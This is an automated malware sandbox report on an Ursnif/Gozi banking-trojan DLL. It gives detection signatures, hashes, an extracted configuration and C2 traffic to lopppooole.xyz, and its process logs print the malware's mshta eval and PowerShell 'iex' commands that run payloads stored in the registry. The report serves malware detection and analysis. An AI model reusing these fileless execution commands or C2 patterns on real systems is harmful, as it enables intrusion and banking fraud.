Analysis Report 6006bde674be5pdf.dll

Overview

General Information

Sample Name: 6006bde674be5pdf.dll
Analysis ID: 341463
MD5: 2df646cf624fc096ebf0b19051ac4e93
SHA1: 3e0769682853d0538845221a2e51df7fb1ba15e7
SHA256: adc95420bda0ec4fcf33c410be8f86f185e95b642c0619a4103c4a64dac52cc6
Tags: BRTdllGoziISFBUrsnif

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Found malware configuration
Source: loaddll32.exe.6528.0.memstr Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@216041hh", "dns": "216041", "version": "251173", "uptime": "190", "crc": "2", "id": "4355", "user": "c2868f8f08f8d2d8cdc8873a4f316e0b", "soft": "3"}
Machine Learning detection for sample
Source: 6006bde674be5pdf.dll Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.loaddll32.exe.b80000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.10000000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

barindex
Uses 32bit PE files
Source: 6006bde674be5pdf.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000025.00000002.446580708.0000025B61C00000.00000002.00000001.sdmp, csc.exe, 00000027.00000002.452565551.000001A0C3C30000.00000002.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\q35sbhot\q35sbhot.pdb source: powershell.exe, 00000023.00000002.484745131.000001D348989000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\cw4ltk3l\cw4ltk3l.pdb source: powershell.exe, 00000023.00000002.484745131.000001D348989000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\cw4ltk3l\cw4ltk3l.pdbXPbs source: powershell.exe, 00000023.00000002.484745131.000001D348989000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\q35sbhot\q35sbhot.pdbXPbs source: powershell.exe, 00000023.00000002.484745131.000001D348989000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D83771 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_00D83771
Source: global traffic HTTP traffic detected: GET /manifest/oyJf0dGchaAIoPel8/K1RFX8SwNbhQ/LLcUCPEPYkE/8YDGV2vEEgf7ZQ/cuAAx0dK_2BD_2BCaXfl8/tYaseMvEDk08K6JZ/EQ1XEWDhVGtM7k6/BJ4Pdn_2BFeo6ztzsI/hH1xi6vBb/jeSTvozPXDGpukgDPifK/ZqYCwBGYzwKmTN9WLyu/YJCKUABXAbPwOK69xlPBEF/QfRL.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: lopppooole.xyzConnection: Keep-AliveCookie: PHPSESSID=vf1vsvjs3vof8r12p2dbsn0nn0; lang=en
Source: global traffic HTTP traffic detected: GET /manifest/3mgKpbqap/nRh42wkizRuvQnbKS_2F/cCGI9puqMbPkyNKOhmJ/b6rBRnCNcK3Gj8zdaEyqxk/VAqy1dm3jpPlG/j1RG_2Bc/1uTqOdAEPiJDVBM_2BK9PM9/y0tKrkAQ_2/FftiHkrj4ukmbz_2B/G_2FPN2wDsAF/U672kCrC9_2/BSj9NgQY4NjW4D/90Kz0XaJ1enkeMLmCHfkG/BeMe0t_2/F.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-AliveCookie: lang=en
Source: global traffic HTTP traffic detected: GET /manifest/cNkFxpqSE5nd5N/gLAA0dyVD8A3Z7_2BjmH5/tzFBxUiAG5YX2vfV/FVz0o_2FSL_2B6T/iN0NSUy8SncBbYRKc3/KPDSKZIZS/WtBJPob_2BilVYW_2B9G/6u_2FmjF2UFAmHQwi5C/aSK9Qm4Z2DiEhqzDMBjYMU/8MZPUvBulE5H9/Ejycupjc/hcDUTN98Kjxa7fmsGrqhHCa/QjS2y_2F.cnx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: lopppooole.xyzConnection: Keep-AliveCookie: lang=en
Source: msapplication.xml0.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbc54c452,0x01d6ee9f</date><accdate>0xbc54c452,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbc54c452,0x01d6ee9f</date><accdate>0xbc54c452,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbc5726aa,0x01d6ee9f</date><accdate>0xbc5726aa,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbc5726aa,0x01d6ee9f</date><accdate>0xbc5726aa,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbc598934,0x01d6ee9f</date><accdate>0xbc598934,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.5.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbc598934,0x01d6ee9f</date><accdate>0xbc598934,0x01d6ee9f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: lopppooole.xyz
Source: powershell.exe, 00000023.00000003.457204076.000001D35D1C0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000023.00000003.457204076.000001D35D1C0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000023.00000003.440910153.000001D35CB32000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 6006bde674be5pdf.dll String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 6006bde674be5pdf.dll String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000023.00000003.457204076.000001D35D1C0000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: imagestore.dat.28.dr String found in binary or memory: http://lopppooole.xyz/favicon.ico
Source: imagestore.dat.28.dr, imagestore.dat.27.dr String found in binary or memory: http://lopppooole.xyz/favicon.ico~
Source: {0E23EAFA-5A93-11EB-90E5-ECF4BB570DC9}.dat.27.dr String found in binary or memory: http://lopppooole.xyz/manifest/3mgKpbqap/nRh42wkizRuvQnbKS_2F/cCGI9puqMbPkyNKOhmJ/b6rBRnCNcK3Gj8zdaE
Source: {0E23EAFC-5A93-11EB-90E5-ECF4BB570DC9}.dat.27.dr String found in binary or memory: http://lopppooole.xyz/manifest/cNkFxpqSE5nd5N/gLAA0dyVD8A3Z7_2BjmH5/tzFBxUiAG5YX2vfV/FVz0o_2FSL_2B6T
Source: ~DFB117E7EBEBF705EA.TMP.27.dr, {0E23EAF8-5A93-11EB-90E5-ECF4BB570DC9}.dat.27.dr String found in binary or memory: http://lopppooole.xyz/manifest/oyJf0dGchaAIoPel8/K1RFX8SwNbhQ/LLcUCPEPYkE/8YDGV2vEEgf7ZQ/cuAAx0dK_2B
Source: powershell.exe, 00000023.00000002.485204654.000001D3547E0000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: 6006bde674be5pdf.dll String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000023.00000002.462578010.000001D34498E000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000023.00000002.462182437.000001D344781000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msapplication.xml.5.dr String found in binary or memory: http://www.amazon.com/
Source: powershell.exe, 00000023.00000002.462578010.000001D34498E000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msapplication.xml1.5.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.5.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.5.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.5.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.5.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.5.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.5.dr String found in binary or memory: http://www.youtube.com/
Source: powershell.exe, 00000023.00000002.485204654.000001D3547E0000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000023.00000002.485204654.000001D3547E0000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000023.00000002.485204654.000001D3547E0000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000023.00000002.462578010.000001D34498E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000023.00000002.485204654.000001D3547E0000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 6006bde674be5pdf.dll String found in binary or memory: https://sectigo.com/CPS0D

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.267174512.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267021391.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267187434.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267110457.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267049482.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.412616743.00000000031BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267090399.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.457204076.000001D35D1C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267156690.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267129257.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6716, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6528, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: loaddll32.exe, 00000000.00000002.461629981.0000000000D9B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.267174512.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267021391.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267187434.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267110457.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267049482.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.412616743.00000000031BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267090399.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.457204076.000001D35D1C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267156690.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.267129257.00000000033B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6716, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6528, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001B88 GetProcAddress,NtCreateSection,memset, 0_2_10001B88
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100018B2 NtMapViewOfSection, 0_2_100018B2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100019C8 GetLastError,NtClose, 0_2_100019C8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100022E5 NtQueryVirtualMemory, 0_2_100022E5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D81FAC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_00D81FAC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D8B321 NtQueryVirtualMemory, 0_2_00D8B321
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100020C4 0_2_100020C4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D8B0FC 0_2_00D8B0FC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D85270 0_2_00D85270
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D8832D 0_2_00D8832D
PE / OLE file has an invalid certificate
Source: 6006bde674be5pdf.dll Static PE information: invalid certificate
PE file does not import any functions
Source: cw4ltk3l.dll.37.dr Static PE information: No import functions for PE file found
Source: q35sbhot.dll.39.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Uses 32bit PE files
Source: 6006bde674be5pdf.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: classification engine Classification label: mal100.troj.evad.winDLL@25/62@6/2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00D814FE CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 0_2_00D814FE
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E6DB6EAA-5A92-11EB-90E5-ECF4BB570DC9}.dat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6025599D-3F19-9255-C994-E3E60D08C77A}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5704:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF43E72D5B933A428D.TMP Jump to behavior
Source: 6006bde674be5pdf.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\6006bde674be5pdf.dll'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7036 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4192 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:17422 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cw4ltk3l\cw4ltk3l.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES17C2.tmp' 'c:\Users\user\AppData\Local\Temp\cw4ltk3l\CSC9C603ACDE65242378EE2E6EB79AAF5F2.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q35sbhot\q35sbhot.cmdline'
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7036 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4192 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:17422 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4308 CREDAT:82962 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cw4ltk3l\cw4ltk3l.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q35sbhot\q35sbhot.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES17C2.tmp' 'c:\Users\user\AppData\Local\Temp\cw4ltk3l\CSC9C603ACDE65242378EE2E6EB79AAF5F2.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
